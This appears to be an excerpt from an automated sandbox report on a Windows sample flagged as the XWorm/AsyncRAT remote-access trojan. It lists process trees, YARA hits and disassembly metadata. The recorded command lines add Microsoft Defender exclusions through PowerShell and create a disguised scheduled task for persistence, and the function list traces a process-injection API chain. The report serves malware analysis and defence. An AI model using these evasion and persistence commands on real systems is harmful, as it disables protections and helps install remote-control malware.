                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000010.00000002.2163931121.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000010.00000002.2163931121.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                              Has exited:true

                              General

                              Target ID:17
                              Start time:05:31:11
                              Start date:31/10/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SS Bottmac Engineers Pvt. Ltd..exe'
                              Imagebase:0x8e0000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:18
                              Start time:05:31:11
                              Start date:31/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:20
                              Start time:05:31:16
                              Start date:31/10/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe'
                              Imagebase:0x8e0000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:21
                              Start time:05:31:16
                              Start date:31/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:22
                              Start time:05:31:31
                              Start date:31/10/2024
                              Path:C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
                              Imagebase:0xd30000
                              File size:575'496 bytes
                              MD5 hash:FF9E45D7326698F34526793BF1244811
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                              Antivirus matches:
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 39%, ReversingLabs
                              Has exited:true

                              General

                              Target ID:23
                              Start time:05:31:33
                              Start date:31/10/2024
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpE6A.tmp"
                              Imagebase:0x5a0000
                              File size:187'904 bytes
                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:24
                              Start time:05:31:33
                              Start date:31/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:25
                              Start time:05:31:33
                              Start date:31/10/2024
                              Path:C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
                              Imagebase:0x2b0000
                              File size:575'496 bytes
                              MD5 hash:FF9E45D7326698F34526793BF1244811
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:26
                              Start time:05:31:33
                              Start date:31/10/2024
                              Path:C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
                              Imagebase:0x470000
                              File size:575'496 bytes
                              MD5 hash:FF9E45D7326698F34526793BF1244811
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:27
                              Start time:05:31:40
                              Start date:31/10/2024
                              Path:C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
                              Imagebase:0xe70000
                              File size:575'496 bytes
                              MD5 hash:FF9E45D7326698F34526793BF1244811
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001B.00000002.2469960785.00000000036E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001B.00000002.2469960785.00000000036E4000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                              Has exited:true

                              General

                              Target ID:28
                              Start time:05:31:41
                              Start date:31/10/2024
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp2E66.tmp"
                              Imagebase:0x5a0000
                              File size:187'904 bytes
                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:29
                              Start time:05:31:41
                              Start date:31/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:30
                              Start time:05:31:42
                              Start date:31/10/2024
                              Path:C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
                              Imagebase:0x2f0000
                              File size:575'496 bytes
                              MD5 hash:FF9E45D7326698F34526793BF1244811
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:31
                              Start time:05:31:42
                              Start date:31/10/2024
                              Path:C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
                              Imagebase:0x710000
                              File size:575'496 bytes
                              MD5 hash:FF9E45D7326698F34526793BF1244811
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:10.6%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:3.3%
                                Total number of Nodes:90
                                Total number of Limit Nodes:4
                                execution_graph 25770 17c4668 25771 17c467a 25770->25771 25772 17c4686 25771->25772 25776 17c4778 25771->25776 25781 17c4204 25772->25781 25774 17c46a5 25777 17c479d 25776->25777 25785 17c4878 25777->25785 25789 17c4888 25777->25789 25782 17c420f 25781->25782 25797 17c59fc 25782->25797 25784 17c7084 25784->25774 25787 17c4888 25785->25787 25786 17c498c 25786->25786 25787->25786 25793 17c4560 25787->25793 25791 17c48af 25789->25791 25790 17c498c 25790->25790 25791->25790 25792 17c4560 CreateActCtxA 25791->25792 25792->25790 25794 17c5d18 CreateActCtxA 25793->25794 25796 17c5ddb 25794->25796 25798 17c5a07 25797->25798 25801 17c5a1c 25798->25801 25800 17c7425 25800->25784 25802 17c5a27 25801->25802 25805 17c5a4c 25802->25805 25804 17c7502 25804->25800 25806 17c5a57 25805->25806 25809 17c5a7c 25806->25809 25808 17c7605 25808->25804 25810 17c5a87 25809->25810 25812 17c8b6b 25810->25812 25815 17cae10 25810->25815 25811 17c8ba9 25811->25808 25812->25811 25818 17ccf00 25812->25818 25824 17cb250 25815->25824 25819 17ccf31 25818->25819 25820 17ccf55 25819->25820 25832 17cd4c8 25819->25832 25836 17cd520 25819->25836 25840 17cd4b9 25819->25840 25820->25811 25827 17cb344 25824->25827 25825 17cae26 25825->25812 25829 17cb348 25827->25829 25828 17cb37c 25828->25825 25829->25828 25830 17cb580 GetModuleHandleW 25829->25830 25831 17cb5ad 25830->25831 25831->25825 25833 17cd4d5 25832->25833 25834 17cd50f 25833->25834 25844 17cd2f0 25833->25844 25834->25820 25837 17cd4e0 25836->25837 25838 17cd50f 25837->25838 25839 17cd2f0 GetModuleHandleW 25837->25839 25838->25820 25839->25838 25841 17cd4c8 25840->25841 25842 17cd50f 25841->25842 25843 17cd2f0 GetModuleHandleW 25841->25843 25842->25820 25843->25842 25845 17cd2fb 25844->25845 25847 17cde20 25845->25847 25848 17cd40c 25845->25848 25847->25847 25849 17cd417 25848->25849 25850 17c5a7c GetModuleHandleW 25849->25850 25851 17cde8f 25850->25851 25851->25847 25852 17cd828 DuplicateHandle 25853 17cd8be 25852->25853 25864 786d5e0 25865 786d62b ReadProcessMemory 25864->25865 25867 786d66f 25865->25867 25868 786cf20 25869 786cf65 Wow64SetThreadContext 25868->25869 25871 786cfad 25869->25871 25872 786d4f0 25873 786d538 WriteProcessMemory 25872->25873 25875 786d58f 25873->25875 25876 786d430 25877 786d470 VirtualAllocEx 25876->25877 25879 786d4ad 25877->25879 25880 786ce70 25881 786ceb0 ResumeThread 25880->25881 25883 786cee1 25881->25883 25854 17cd5e0 25855 17cd626 GetCurrentProcess 25854->25855 25857 17cd678 GetCurrentThread 25855->25857 25858 17cd671 25855->25858 25859 17cd6ae 25857->25859 25860 17cd6b5 GetCurrentProcess 25857->25860 25858->25857 25859->25860 25861 17cd6eb 25860->25861 25862 17cd713 GetCurrentThreadId 25861->25862 25863 17cd744 25862->25863 25884 786d778 25885 786d801 CreateProcessA 25884->25885 25887 786d9c3 25885->25887

                                Executed Functions

                                Function 07860E28 Relevance: .5, Instructions: 506COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d0f8958c3d5a8526f8a45951c69737671a5c40a2616b4fb629a53e41a005d62d
                                • Instruction ID: 5354b3352606928cdcdad1f6b6e925eca5a96a58bdfd07dd5928fc1104d7cd39
                                • Opcode Fuzzy Hash: d0f8958c3d5a8526f8a45951c69737671a5c40a2616b4fb629a53e41a005d62d
                                • Instruction Fuzzy Hash: 014270B4E01219DFDB54CFA9C988B9DBBF2BF88311F1481A9D809A7355D734AA81CF50
                                Function 017C4204 Relevance: .2, Instructions: 228COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072664453.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_17c0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b54adf97832790e4826355ce26bbbe26813bbeb1824ee67b5010753553f39744
                                • Instruction ID: 52f0c8fb73d8a9efd1672140042d910ca505fe8f60e369000dccaa30e418542d
                                • Opcode Fuzzy Hash: b54adf97832790e4826355ce26bbbe26813bbeb1824ee67b5010753553f39744
                                • Instruction Fuzzy Hash: 8DA1C774E00208DFDB05DFAAD994A9DBBB6FF88300F108469E809A7364DB355D86CF55
                                Function 017C7018 Relevance: .2, Instructions: 228COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072664453.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_17c0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 065ae161e9a36c969412793ddc702275e80853dae09b4b208a317f6b473bf4b7
                                • Instruction ID: 905c939d182e0ba1a2fdac1f150777f27addb4a94107c4f44a008b1e285d0fa5
                                • Opcode Fuzzy Hash: 065ae161e9a36c969412793ddc702275e80853dae09b4b208a317f6b473bf4b7
                                • Instruction Fuzzy Hash: 4FA1D674E00208DFDB05DFAAD994A9DBBB6FF88300F108469E809A7364DB355D86CF45
                                Function 07860E21 Relevance: .1, Instructions: 147COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6af436c27b289abc28f69299d40832e355a1d3ba2523bf117080b4642ba720ae
                                • Instruction ID: 945d075d30643fdac9455279b60c012acabf8983d8103229183646ff229eada9
                                • Opcode Fuzzy Hash: 6af436c27b289abc28f69299d40832e355a1d3ba2523bf117080b4642ba720ae
                                • Instruction Fuzzy Hash: 9B6185B4E01218DFEB18CFAAD985B9DBBF2BF88310F1481A9D809A7355DB359941CF50
                                Function 017CD5D0 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 295 17cd5d0-17cd66f GetCurrentProcess 300 17cd678-17cd6ac GetCurrentThread 295->300 301 17cd671-17cd677 295->301 302 17cd6ae-17cd6b4 300->302 303 17cd6b5-17cd6e9 GetCurrentProcess 300->303 301->300 302->303 305 17cd6eb-17cd6f1 303->305 306 17cd6f2-17cd70d call 17cd7b1 303->306 305->306 308 17cd713-17cd742 GetCurrentThreadId 306->308 310 17cd74b-17cd7ad 308->310 311 17cd744-17cd74a 308->311 311->310
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 017CD65E
                                • GetCurrentThread.KERNEL32 ref: 017CD69B
                                • GetCurrentProcess.KERNEL32 ref: 017CD6D8
                                • GetCurrentThreadId.KERNEL32 ref: 017CD731
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072664453.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_17c0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 355cfb2e91799d565bc9415247fa3c1173dd5744440f93755609646b42cfcb04
                                • Instruction ID: 4744f2adcf2502f7c1535adbaf45c822f133dbbc1543550e7e343e5dcdce0ade
                                • Opcode Fuzzy Hash: 355cfb2e91799d565bc9415247fa3c1173dd5744440f93755609646b42cfcb04
                                • Instruction Fuzzy Hash: DF5135B09006498FDB18DFA9D548BEEBBF1EF49304F20806DD419A7260D7385984CBA5
                                Function 017CD5E0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 318 17cd5e0-17cd66f GetCurrentProcess 322 17cd678-17cd6ac GetCurrentThread 318->322 323 17cd671-17cd677 318->323 324 17cd6ae-17cd6b4 322->324 325 17cd6b5-17cd6e9 GetCurrentProcess 322->325 323->322 324->325 327 17cd6eb-17cd6f1 325->327 328 17cd6f2-17cd70d call 17cd7b1 325->328 327->328 330 17cd713-17cd742 GetCurrentThreadId 328->330 332 17cd74b-17cd7ad 330->332 333 17cd744-17cd74a 330->333 333->332
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 017CD65E
                                • GetCurrentThread.KERNEL32 ref: 017CD69B
                                • GetCurrentProcess.KERNEL32 ref: 017CD6D8
                                • GetCurrentThreadId.KERNEL32 ref: 017CD731
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072664453.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_17c0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: cb3ec192c79225c163e7a01137c6a6fd68d09d69c0c3b83822419912ccfedbcb
                                • Instruction ID: ca0358877ab3d998f4b9d7cf967c58ffe265ec1e24cf08be435de90d4204d3ce
                                • Opcode Fuzzy Hash: cb3ec192c79225c163e7a01137c6a6fd68d09d69c0c3b83822419912ccfedbcb
                                • Instruction Fuzzy Hash: EB5124B09002498FDB18DFA9D548BEEFBF5FF48304F24846DD419A7260D7789984CBA5
                                Function 0786D76C Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 430 786d76c-786d80d 433 786d846-786d866 430->433 434 786d80f-786d819 430->434 441 786d89f-786d8ce 433->441 442 786d868-786d872 433->442 434->433 435 786d81b-786d81d 434->435 436 786d840-786d843 435->436 437 786d81f-786d829 435->437 436->433 439 786d82d-786d83c 437->439 440 786d82b 437->440 439->439 443 786d83e 439->443 440->439 448 786d907-786d9c1 CreateProcessA 441->448 449 786d8d0-786d8da 441->449 442->441 444 786d874-786d876 442->444 443->436 446 786d878-786d882 444->446 447 786d899-786d89c 444->447 450 786d886-786d895 446->450 451 786d884 446->451 447->441 462 786d9c3-786d9c9 448->462 463 786d9ca-786da50 448->463 449->448 453 786d8dc-786d8de 449->453 450->450 452 786d897 450->452 451->450 452->447 454 786d8e0-786d8ea 453->454 455 786d901-786d904 453->455 457 786d8ee-786d8fd 454->457 458 786d8ec 454->458 455->448 457->457 460 786d8ff 457->460 458->457 460->455 462->463 473 786da52-786da56 463->473 474 786da60-786da64 463->474 473->474 475 786da58 473->475 476 786da66-786da6a 474->476 477 786da74-786da78 474->477 475->474 476->477 478 786da6c 476->478 479 786da7a-786da7e 477->479 480 786da88-786da8c 477->480 478->477 479->480 481 786da80 479->481 482 786da9e-786daa5 480->482 483 786da8e-786da94 480->483 481->480 484 786daa7-786dab6 482->484 485 786dabc 482->485 483->482 484->485 487 786dabd 485->487 487->487
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0786D9AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: ca0961dd9be36ee05fc30b3f5a92fd09ce14a63126d8db97fd8b91a18957b300
                                • Instruction ID: 5a759417ed3806e6478226af532e444fdcae09257c497599bcc9d1c78d19b7b7
                                • Opcode Fuzzy Hash: ca0961dd9be36ee05fc30b3f5a92fd09ce14a63126d8db97fd8b91a18957b300
                                • Instruction Fuzzy Hash: 14A169B1E0021ADFDF10CF69C849BEDBBB2AF54714F1485A9D808E7240DB749985CFA2
                                Function 0786D778 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 488 786d778-786d80d 490 786d846-786d866 488->490 491 786d80f-786d819 488->491 498 786d89f-786d8ce 490->498 499 786d868-786d872 490->499 491->490 492 786d81b-786d81d 491->492 493 786d840-786d843 492->493 494 786d81f-786d829 492->494 493->490 496 786d82d-786d83c 494->496 497 786d82b 494->497 496->496 500 786d83e 496->500 497->496 505 786d907-786d9c1 CreateProcessA 498->505 506 786d8d0-786d8da 498->506 499->498 501 786d874-786d876 499->501 500->493 503 786d878-786d882 501->503 504 786d899-786d89c 501->504 507 786d886-786d895 503->507 508 786d884 503->508 504->498 519 786d9c3-786d9c9 505->519 520 786d9ca-786da50 505->520 506->505 510 786d8dc-786d8de 506->510 507->507 509 786d897 507->509 508->507 509->504 511 786d8e0-786d8ea 510->511 512 786d901-786d904 510->512 514 786d8ee-786d8fd 511->514 515 786d8ec 511->515 512->505 514->514 517 786d8ff 514->517 515->514 517->512 519->520 530 786da52-786da56 520->530 531 786da60-786da64 520->531 530->531 532 786da58 530->532 533 786da66-786da6a 531->533 534 786da74-786da78 531->534 532->531 533->534 535 786da6c 533->535 536 786da7a-786da7e 534->536 537 786da88-786da8c 534->537 535->534 536->537 538 786da80 536->538 539 786da9e-786daa5 537->539 540 786da8e-786da94 537->540 538->537 541 786daa7-786dab6 539->541 542 786dabc 539->542 540->539 541->542 544 786dabd 542->544 544->544
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0786D9AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 30aff60e7c834478a3129ec76e69166601c16aece7535c4c61b6bd9048dfbe6d
                                • Instruction ID: 6a56ae65e8fb870e7ce7bf5409fb1deff8cab47d247cc342f455df3270508f04
                                • Opcode Fuzzy Hash: 30aff60e7c834478a3129ec76e69166601c16aece7535c4c61b6bd9048dfbe6d
                                • Instruction Fuzzy Hash: 4B9149B1E0021ADFDF24CF69C849BADBAB2AF54714F0485A9D809E7240DB749985CFA1
                                Function 017CB344 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 545 17cb344-17cb346 546 17cb348 545->546 547 17cb349-17cb357 545->547 546->547 548 17cb359-17cb366 call 17c9db8 547->548 549 17cb383-17cb387 547->549 556 17cb37c 548->556 557 17cb368 548->557 550 17cb389 549->550 551 17cb39b-17cb3dc 549->551 554 17cb393 550->554 558 17cb3de-17cb3e6 551->558 559 17cb3e9-17cb3f7 551->559 554->551 556->549 602 17cb36e call 17cb5e0 557->602 603 17cb36e call 17cb5d0 557->603 558->559 560 17cb3f9-17cb3fe 559->560 561 17cb41b-17cb41d 559->561 564 17cb409 560->564 565 17cb400-17cb407 call 17cb000 560->565 563 17cb420-17cb427 561->563 562 17cb374-17cb376 562->556 566 17cb4b8-17cb578 562->566 567 17cb429-17cb431 563->567 568 17cb434-17cb43b 563->568 570 17cb40b-17cb419 564->570 565->570 597 17cb57a-17cb57d 566->597 598 17cb580-17cb5ab GetModuleHandleW 566->598 567->568 571 17cb43d-17cb445 568->571 572 17cb448-17cb451 call 17cb010 568->572 570->563 571->572 578 17cb45e-17cb463 572->578 579 17cb453-17cb45b 572->579 580 17cb465-17cb46c 578->580 581 17cb481-17cb48e 578->581 579->578 580->581 583 17cb46e-17cb47e call 17cb020 call 17cb030 580->583 587 17cb490-17cb4ae 581->587 588 17cb4b1-17cb4b7 581->588 583->581 587->588 597->598 599 17cb5ad-17cb5b3 598->599 600 17cb5b4-17cb5c8 598->600 599->600 602->562 603->562
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072664453.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_17c0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 03b3d45aaae69680a3c2349455a18b8bb788d598e50f4d7207c5ef94f6a61e88
                                • Instruction ID: 6f15f35ffd74eaeef5307d465a0fe77478471ee01841d57a209fe7f4c7443197
                                • Opcode Fuzzy Hash: 03b3d45aaae69680a3c2349455a18b8bb788d598e50f4d7207c5ef94f6a61e88
                                • Instruction Fuzzy Hash: 69813070A00B058FD724DF69D44579ABBF5FF88740F00892EE48A9BA50D734E949CB90
                                Function 017C4560 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 604 17c4560-17c5dd9 CreateActCtxA 607 17c5ddb-17c5de1 604->607 608 17c5de2-17c5e3c 604->608 607->608 615 17c5e3e-17c5e41 608->615 616 17c5e4b-17c5e4f 608->616 615->616 617 17c5e60 616->617 618 17c5e51-17c5e5d 616->618 620 17c5e61 617->620 618->617 620->620
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 017C5DC9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072664453.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_17c0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: cf3217ae79b7553108aaf1cedd08d3c3cb5009e4d0ef677c54eaa2128cb2e945
                                • Instruction ID: 412fe052cab099689fbd5435de8361e5ba67887e7a4c3ff6dbe1572234daa6d1
                                • Opcode Fuzzy Hash: cf3217ae79b7553108aaf1cedd08d3c3cb5009e4d0ef677c54eaa2128cb2e945
                                • Instruction Fuzzy Hash: B841FFB0D00719CBDB24DFA9C844B9EFBB5BF49704F20806ED418AB255DB756946CF90
                                Function 017C5D0C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 621 17c5d0c-17c5dd9 CreateActCtxA 623 17c5ddb-17c5de1 621->623 624 17c5de2-17c5e3c 621->624 623->624 631 17c5e3e-17c5e41 624->631 632 17c5e4b-17c5e4f 624->632 631->632 633 17c5e60 632->633 634 17c5e51-17c5e5d 632->634 636 17c5e61 633->636 634->633 636->636
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 017C5DC9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072664453.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_17c0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 4d35e8da92237a4e7f3fce543d9dcd1911b96f6599cfd45bda733db5f7f975d4
                                • Instruction ID: db2c699d5f455105010b16260e3e9dc6e3e919eddbf3363991ee922c19085d4e
                                • Opcode Fuzzy Hash: 4d35e8da92237a4e7f3fce543d9dcd1911b96f6599cfd45bda733db5f7f975d4
                                • Instruction Fuzzy Hash: A341FFB0D00319CADB25CFA9C888BDDBBB5BF49704F20806ED418AB255DB766946CF90
                                Function 0786D4E9 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 637 786d4e9-786d53e 640 786d540-786d54c 637->640 641 786d54e-786d58d WriteProcessMemory 637->641 640->641 643 786d596-786d5c6 641->643 644 786d58f-786d595 641->644 644->643
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0786D580
                                Memory Dump Source
